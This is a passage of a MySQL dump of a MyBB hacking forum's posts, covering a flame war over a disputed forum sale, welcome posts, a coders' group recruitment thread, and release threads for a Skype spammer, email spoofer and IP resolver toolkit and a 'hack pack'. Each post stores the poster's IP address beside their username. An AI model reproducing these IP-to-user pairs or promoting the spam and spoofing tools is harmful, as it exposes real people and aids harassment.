jok3r\' pid=\'3854\' dateline=\'1349656866\'] [quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\'] [quote=\'t3h jok3r\' pid=\'3852\' dateline=\'1349656495\'] Prove it. [/quote] How do I prove I didn\'t attack you? That makes no sense. I would have to find out who did. [/quote] Go through your forums PMs and find who did it. Also tell me do you have any other enemies online? [/quote] Lets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up. Not only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us. [/quote] Lol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod. [/quote] You must be on drugs.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'b0fd074a1ed3313be267023cb14797d0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3859', '757', '3855', '19', 'RE: Site Owner', '0', '232', 'BreShiE', '1349657782', 'You got scammed, and you deserved it. Deal with it. Become a better person, and learn some more things before trying to be an administrator.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '1cfd60ee268d7eebd836834284507ffd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3860', '747', '3858', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '1', 't3h jok3r', '1349657808', '[quote=\'Anarchy $ucks\' pid=\'3858\' dateline=\'1349657526\'] [quote=\'t3h jok3r\' pid=\'3857\' dateline=\'1349657256\'] [quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\'] [quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\'] [quote=\'Anarchy $ucks\' pid=\'3853\' dateline=\'1349656687\'] How do I prove I didn\'t attack you? That makes no sense. I would have to find out who did. [/quote] Go through your forums PMs and find who did it. Also tell me do you have any other enemies online? [/quote] Lets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up. Not only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us. [/quote] Lol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod. [/quote] You must be on drugs. [/quote] If your mom likes getting laid every night then yes I\'m on drugs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cf9fa3b2a93cda87f17d3afc62e7b5ee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3861', '747', '3860', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349657882', '[quote=\'t3h jok3r\' pid=\'3860\' dateline=\'1349657808\'] [quote=\'Anarchy $ucks\' pid=\'3858\' dateline=\'1349657526\'] [quote=\'t3h jok3r\' pid=\'3857\' dateline=\'1349657256\'] [quote=\'Anarchy $ucks\' pid=\'3856\' dateline=\'1349657148\'] [quote=\'t3h jok3r\' pid=\'3854\' dateline=\'1349656866\'] Go through your forums PMs and find who did it. Also tell me do you have any other enemies online? [/quote] Lets look at it this way. You scammed for money, and you\'re asking for my help to find your attacker? I doubt someone from our site would even bother. Whoever did it is probably asleep right now, and they will probably continue when they wake up. Not only that, but you don\'t have the best track record of finding attackers. One of your users said you accused him for some downtime yesterday? Now you\'re accusing us. [/quote] Lol Ipod is my best friend and likes to joke around a lot. You can ask anyone on this forum how good of a friend is Ipod. [/quote] You must be on drugs. [/quote] If your mom likes getting laid every night then yes I\'m on drugs. [/quote] You are an amazing site administrator. I will be sure to give you our site.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'c636147f51156ba721b0b85c10f23b4a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3862', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '232', 'BreShiE', '1349657908', 'Anarchy, this forum is better than yours, end of. Stop making new accounts just because you have nothing better to do.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '9ee5aca6cc1989ebbcbde59784663595', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3863', '757', '3855', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349657928', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3864', '756', '3851', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349657941', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3865', '745', '3798', '59', 'RE: [Leak] Huge Folder of Ebooks', '0', '232', 'BreShiE', '1349657980', 'Thanks for these man, going to give them a read through. They look quite interesting.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', 'f49b4bbad404ae689636fd6f4dff3317', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3867', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349658345', 'Dam fuckin straight. Anarchy forums is shit compared to LH....LH rules and i will continue to be active on here through it all :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'f514427847215153cc3e04ab7fc529fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3868', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '243', 'Anarchy $ucks', '1349658911', 'The site owner just threatened to contact my ISP. Hilarious.', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', '2439f41658015780ab1ba8a8e0ebbf4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3869', '758', '0', '19', '[Junk]Site Owner', '0', '243', 'Anarchy $ucks', '1349658942', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google. [b]Update:[/b] [quote=\'t3h jok3r\'] Your staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn. [/quote]', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'cd6065cb4bcf67bbc4361c4243f445c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3870', '747', '3868', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '232', 'BreShiE', '1349658947', '[quote=\'Contact My ISP\' pid=\'3868\' dateline=\'1349658911\'] The site owner just threatened to contact my ISP. Hilarious. [/quote] Stop making new accounts, you pathetic excuse of a human being.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '20aabf47c90f921a89f5db68f04ddce7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3871', '759', '0', '7', 'Join the LH Skype Group!', '0', '214', 'Rave™', '1349658994', '[align=center] [size=xx-large] [color=#32CD32] L33THacking Skype Group! [/size][size=medium][/color][color=#00BFFF] To join the chat follow these steps: [spoiler] Request: spushkin1 or flamingworm [/spoiler] [/size][/color][color=#FF4500] Rules: DOX\'s MUST Be Deleted One Minute After Posting No DDOSING No Grabbing IPS No JDB\'s No Porn unless warned [/color][/align]', '71.67.179.16', '1195619088', '1', '0', '214', '1349659288', '1', 'a978e740f51edab8476757e66b38b288', '0', '1349659288'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3872', '760', '0', '19', '[Junk]The Site Owner', '0', '243', 'Anarchy $ucks', '1349659096', 'Originally I had offered to buy L33thacking.net from t3h jok3r. Unfortunately, they are a scammer, and not a person to do business with. I had purchased the forum for the sum of $30.00 USD (only $18.00 USD was paid), but they never honored their end of the deal. In our deal, I was to receive: [list] [*]The domain [*]Their database [*]A full backup of the site [*]Any themes used on the site [/list] I haven\'t received any of these yet, and they have been spreading false rumors about us being involved in several attacks on their site. I apologize for any information I gave you that is no longer valid because of this incident. Unfortunately, I do not have control over scammers, and I can only prevent them from scamming others. [b]Here are screenshots to back my claims:[/b] [spoiler][img]http://imageshack.us/a/img854/6585/evidencen.png[/img][/spoiler] Once again, I hope you guys realize that this isn\'t my fault. Although I hope members of L33thacking see what a poor example of an owner t3h jok3r is. Additionally, I would like to inform you that we had nothing to do with their site\'s downtime, or the removal of their site from Google. [b]Update:[/b] [quote=\'t3h jok3r\'] Your staff have sold your sites information to me, your members don\'t like your site, your sites best members are coming to my site, your staff are leaving your site because they are getting paid to join my website and stay active here. Your site is almost finished, if you want I can make you an Admin and I can give you a video guarantee that this is a real deal and if I cheat you then you can do whatever you want to do. In return, close down your site and tell everyone to join L33THacking. I will also give you 40% of everything I earn. [/quote]', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'f61bab83fa250cc23cc7c33352bfb07f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3873', '759', '3871', '7', 'RE: Join the LH Skype Group!', '0', '232', 'BreShiE', '1349659140', 'I\'ve added you both, I\'d like in please! :)', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '64b3f2283cc58482a6c097bcb7b81069', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3874', '760', '3872', '19', 'RE: The Site Owner', '0', '243', 'Anarchy $ucks', '1349659251', 'Fucken scammer, I go on this site all I see is scam? Any thoughts admin?', '97.254.8.21', '1644038165', '0', '0', '0', '0', '1', '360ca082735ef7544b4a03e7db65e037', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3875', '760', '3874', '19', 'RE: The Site Owner', '0', '243', 'Anarchy $ucks', '1349659469', '[quote=\'Aphstire\' pid=\'3874\' dateline=\'1349659251\'] Fucken scammer, I go on this site all I see is scam? Any thoughts admin? [/quote] He\'ll delete the thread when he sees it. :P', '108.171.103.136', '1823172488', '0', '0', '0', '0', '1', 'b335f1eafe015df9327b0eca38ae3783', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3876', '760', '3872', '19', 'RE: The Site Owner', '0', '222', 'Exposé', '1349659536', 'Honestly I think that all of this bullshit could have been avoided if the 2 forums just stayed on their different paths. Honestly AF is shit....and I hope LH can do good :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '88fd7a17bece6733c0c287513a6f7deb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3888', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '61', 'NXK', '1349661907', 'Welcome to L33t hacking! We\'ve already met And I like you. Helpful already!', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0998b8756263f35f51abbd41ff26e557', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3878', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '222', 'Exposé', '1349659588', 'Sup breshie....welcome to LH...lol even though Iv\'e already talked to you :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '8767a823e6ee8273be1e256f8d7ca10f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3879', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349659685', 'Dude your like fuckin 12 years old. Anarchyforums is complete garbage....', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'ff217e5c7458f3c5f4aa69554fa8880f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3887', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '1', 't3h jok3r', '1349661853', 'Welcome to L33THacking and hope you like L33THacking. Hope you stay active and enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '25f726ab737d7dbc31417c83bba9febf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3881', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '222', 'Exposé', '1349659827', 'Haha from HF? I have like 20 posts bro....and I will see to it that this site get\'s hosting which your little ping attack can\'t take down', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', 'a4bd4b2b34980d704c10a149437a2f81', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3882', '761', '0', '52', 'wTools | Host To IP | Geo-IP | CloudFlare Resolver | AIO Skype Tools', '0', '232', 'BreShiE', '1349661078', 'Welcome to the official thread of wTools. wTools is a next-gen application for multiple tools all built into one free program. Below you can find a list and screenshots of all the current features in the program. There\'s been a lot of work put into this, so I hope you guys enjoy it, and please leave me a comment if you try it out! Thanks to AeonHack for use of his themes. The program is not obfuscated, as this is open source software! [size=medium]Name:[/size] wTools [size=medium]Features:[/size] [list] [*] Easy-To-Use GUI [*] IP Pinger [*] IP Tracer [*] CloudFlare Resolver [*] Email Spoofer - Need to fix [*] Skype Tools [list] [*] Mass Messenger [*] Mass Messenger Spammer [*] Spammer [*] Annoying Spammer [*]Skype Resolver [/list] [*]PortableTweets - Previously a separate project of mine [*]Icon Changer [/list] [size=medium]Download Link:[/size] http://www.mediafire.com/?6wl4a8ykn4v4t3v [size=medium]Virus Scan:[/size] https://www.virustotal.com/file/8e549cba18ca4bc66e81748708e09ebbda58064633d285252a209c7512882076/analysis/1349744282/ http://vscan.novirusthanks.org/analysis/a3a037e7fba67a10e65ea8866270aa35/d3Rvb2xzLWV4ZQ==/ (false positives - I used iexpress for the .DLL files, an icon changer after than and file changer after that) [size=medium]Screenshots:[/size] [spoiler] [img]http://i.imgur.com/Mkpns.png[/img] [img]http://i.imgur.com/fMw36.png[/img] [img]http://i.imgur.com/Ph3Ft.png[/img] [img]http://i.imgur.com/8fC5j.png[/img] [/spoiler] [hr] Released the next update of wTools! Changelog: [list] [*]Added Skype Resolver [*]Added PortableTweets [*]Added Icon Changer [*]Added auto-updater for future updates [/list]', '78.149.61.34', '1318403362', '0', '0', '232', '1349745094', '1', '1f5a5177dc542c4d0ddc1078ce3fa671', '0', '1349744880'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3883', '684', '3498', '19', '[Junk]Webtools - CF Resolver / Email Spoofer / Ping / Skype Tools & more', '0', '1', 't3h jok3r', '1349661206', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3884', '758', '3869', '19', '[Junk]Site Owner', '0', '1', 't3h jok3r', '1349661285', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3885', '760', '3872', '19', '[Junk]The Site Owner', '0', '1', 't3h jok3r', '1349661285', 'This thread has been junked.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3886', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '232', 'BreShiE', '1349661450', 'Yeah, on [i]that one shit forum[/i]. Lol, I\'m so glad I\'m here now instead of there.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', 'd5048f831e42fdc312dcbd7ef8238204', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3889', '762', '0', '58', 'LH Coders: Official Group - Applications: OPEN', '0', '232', 'BreShiE', '1349666395', '[color=#00BFFF][size=small]Welcome to the LH Coders recruitment thread. If you have any questions, don\'t hesitate to leave a comment![/size][/color] [size=large][b]Group Leaders:[/b][/size] [list] [*][url=http://l33thacking.net/user-232.html]BreShiE[/url] [/list] [size=large][b]Requirements:[/b][/size] [size=x-small][color=#00BFFF]Please take note that some of these are the default requirements and some are made by the leaders of LHC.[/color][/size] [list] [*]At least 15 posts [*]Ability To Code (will need proof) [*]Must Be Friendly [*]Understandable level of grammar [*]Ability to help members with patience [/list] [size=large][b]Group Image:[/b][/size] [img]http://l33thacking.net/images/ub/Coders.png[/img] [size=large][b]The Form:[/b][/size] [code] [color=#32CD32][b]What Can You Code:[/b][/color] Answer Here [b][color=#32CD32]Favorite Coding Language:[/color][/b] Answer Here [color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color] Answer Here [color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color] Answer Here [b][color=#32CD32]Age:[/color][/b] Answer Here [b][color=#32CD32]Proof Of Your Coding Abilities:[/color][/b] Answer(s) Here [/code] [size=large][b]Our Goal:[/b][/size] The goal of LHC (LH Coders) is to create a unique group of coders who are willing to support and bring amazing content to this forum. [size=large][b]Extras:[/b][/size] Once accepted into the group, for any program you release on this forum, you have to use the official banner. (see subforum). Please do NOT at ANY time apply via the User CP, all applications here are monitored, and if you\'re accepted, you shall be contacted via PM and added in. [color=#FF0000][size=large][b]Disclaimer:[/b][/size][/color] We withhold the right to deny an application without any reason at all, although you will be notified whether you\'re rejected or accepted. We may also remove you at any time without reason, although this should never happen.', '78.149.61.34', '1318403362', '0', '0', '0', '0', '1', '2a6cf721e9dc5b92a1cd98bc34929232', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3890', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '222', 'Exposé', '1349667218', '[color=#32CD32][b]What Can You Code:[/b][/color] Well I can code in vb.net(pro), java (noob), html(average), php(nubish), and css. I am currently working on learning C++ as it is a high level language and it will really help me further my career and get a good job. [b][color=#32CD32]Favorite Coding Language:[/color][/b] Obviously my language of choice is vb.net as I have studied it for 3 yrs and have created many programs throughout my time. I mostly create web/client software applications that give users the ability to remotely access information and files online. In my early years I developed bots or auto-taskers which did any task that I wanted it to do. Then I started to get into more advanced software development like an rdp application like teamviewer and chat applications etc. Most of the time I freelance for other people if they want applications built. [color=#32CD32][b]Will You Give Support To Fellow Coders:[/b][/color] Of course I will give support to my fellow coders. Why else would I be in this group.? [color=#32CD32][b]How Many Hours Per Week Can You Be On:[/b][/color] I am on like 24/7 and can be on LH like 23/7 of the day haha.', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '817855b368d7dc9c0e565ece7d5ffb27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3891', '763', '0', '58', '[Announcement]Group Changes', '0', '61', 'NXK', '1349667886', 'There has been some changes in groups today. [url=http://l33thacking.net/user-232.html]BreShie[/url] is the new leader of the [b]Coders[/b] group. We added a new group called [b]Fearless[/b] which is ran by [url=http://l33thacking.net/user-222.html]flamingworm[/url]. [b]Unique[/b] group also has a new leader, the new leader is [url=http://l33thacking.net/user-62.html]R?????zo? [/url]', '72.231.24.165', '1223104677', '1', '0', '1', '1349727478', '1', '14b67158e318f0dfa1e8b431bb9f8e26', '0', '1349727478'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3892', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349668170', 'Sure, it would be a good idea.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '73a308ebcbbe35fab580e046e0c3ac4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3893', '762', '3889', '58', 'RE: LH Coders: Official Group - Applications: OPEN', '0', '232', 'BreShiE', '1349668674', 'I\'ve PM\'d you flamingworm. Awaiting the submission.', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', 'fd35f698973e97d7cdf49475367965ac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3894', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '232', 'BreShiE', '1349668954', 'I think it\'ll be better if the font was the same as the one in your signature.', '78.149.61.34', '1318403362', '1', '0', '0', '0', '1', 'ab102de9f4e270ca04572ff90704271c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3895', '764', '0', '15', 'Hack Pack By Timmy | 2GB |', '0', '5', 'Timmy', '1349671302', 'Hello and Welcome LH. Today, ive got another pack for you guys here! I am currently uploading a 2GB hackpack wich ive been adding stuff to since i started with my little hacking life so to say, haha. So, here\'s the download link for you all, please be patient since its over 2GB! Anyways, please check through it, it concludes the most of stuffs, some need to be used in a specific way and etc, but please just PM me or search it up on google or other forums. [lock]https://dl.dropbox.com/u/64014494/HF-Forums.rar[/lock] A picture from the pack: [img]http://i.imgur.com/I38Ro.png[/img]', '72.231.24.165', '1223104677', '1', '0', '1', '1352011287', '1', '1c8e958be0a71c351bf3080cb00ff224', '0', '1352011287'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3896', '747', '3809', '3', 'RE: L33THACKING WAS NEVER SOLD!', '0', '5', 'Timmy', '1349671371', 'I was like WTF for a moment because when Jok3r said was never sold I thought someone cheated Jok3r and sold L33THacking.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '77bd7a401a5dcc12503174230a2cc0a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3897', '749', '3822', '4', 'RE: It\'s BreShiE!', '0', '5', 'Timmy', '1349671401', 'Welcome to L33THacking. I hate that [i]shit[/i] forum too.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 